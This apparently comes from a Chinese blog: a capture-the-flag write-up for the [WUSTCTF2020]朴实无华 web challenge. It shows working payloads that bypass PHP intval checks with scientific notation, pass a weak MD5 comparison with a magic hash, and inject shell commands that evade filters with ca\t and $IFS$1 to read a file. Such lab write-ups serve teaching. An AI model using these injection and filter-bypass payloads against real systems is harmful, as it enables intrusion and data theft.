[WUSTCTF2020]朴实无华

最新推荐文章于 2024-03-07 17:37:43 发布
最新推荐文章于 2024-03-07 17:37:43 发布
阅读量527 收藏 1
点赞数
分类专栏: BUUCTF-web 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44749590/article/details/125206615
版权
本文详细记录了参与WUSTCTF2020挑战的过程,从发现隐藏目录到通过代码审计解决不同级别的安全问题,包括利用科学计数法、弱类型比较及命令注入等技巧获取flag。同时,文章还介绍了如何在火狐浏览器中修复乱码问题。
摘要由CSDN通过智能技术生成

[WUSTCTF2020]朴实无华

打开靶机:
在这里插入图片描述访问/var/www/html/index.php无果,试试robots.txt,得到/fAke_f1agggg.php目录。

在这里插入图片描述访问该目录提示flag不在该目录下,F12网络请求中给了/fl4g.php目录。

在这里插入图片描述
访问/fl4g.php目录,进行代码审计(火狐浏览器修复乱码:菜单->更多工具->定制工具栏->将修复文字编码小工具移到工具标签栏):

在这里插入图片描述level1:使用科学计数法

num=20e3

绕过num小于2020且num+1大于2021(20<2020&&20001>2021)

level2:弱类型比较可以绕过

num=20e3&md5=0e215962017
//md5(0e215962017)=0e291242476940776845150308577824
//弱类型比较:0=0

level3:cmd查看目录

num=20e3&md5=0e215962017&get_flag=ls

在这里插入图片描述使用ca\t绕过cat,使用$IFS$1绕过空格:

/fl4g.php?num=20e3&md5=0e215962017&get_flag=ca\t$IFS$1fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

获取flag:

在这里插入图片描述

引用:
如何修复火狐浏览器的乱码问题(最新版)

甜筒化了 -
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 661
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
WUST-CTF web-朴实无华 wp
qq_42188168的博客
03-30 533
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 &am...
[WUSTCTF2020]朴实无华 1(代码审计intval、MD5、ca\t${IFS})
weixin_45577185的博客
09-08 238
刚打开时乱码: 解决方法:firefox浏览器->地址栏点击右键->菜单栏->查看->修复文字编码 发现有bot的字样,打开robots.txt 发现fAke_f1agggg.php,打开 啥都没有,抓一下当前网页的包 发现 /fl4g.php,打开,发现代码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //leve
WEB狗的各种绕过 —— 【WUST-CTF2020】朴实无华
Ve99tr’s Blog
03-30 4627
web狗的各种绕过:intval函数绕过、双重MD5以及==弱类型、空格过滤绕过
[WUSTCTF 2020]朴实无华
最新发布
The_Epiphany的博客
03-07 1407
在本题中PHP版本为5.6.40,若传入value为“1e4”第一次会被识别为字符串,返回值为1,后+1时会被识别为数字,返回1e4+1。如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);如果字符串以 "0b" (或 "0B") 开头,使用 2 进制 (binary);如果字符串以 "0" 开始,使用 8 进制(octal);很综合的一道题,虽然比较简单,但是可以用来进行知识巩固,不多逼逼直接开始。弱相等,原理是比较时截断,前保留后丢弃。反斜线:即转义字符;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值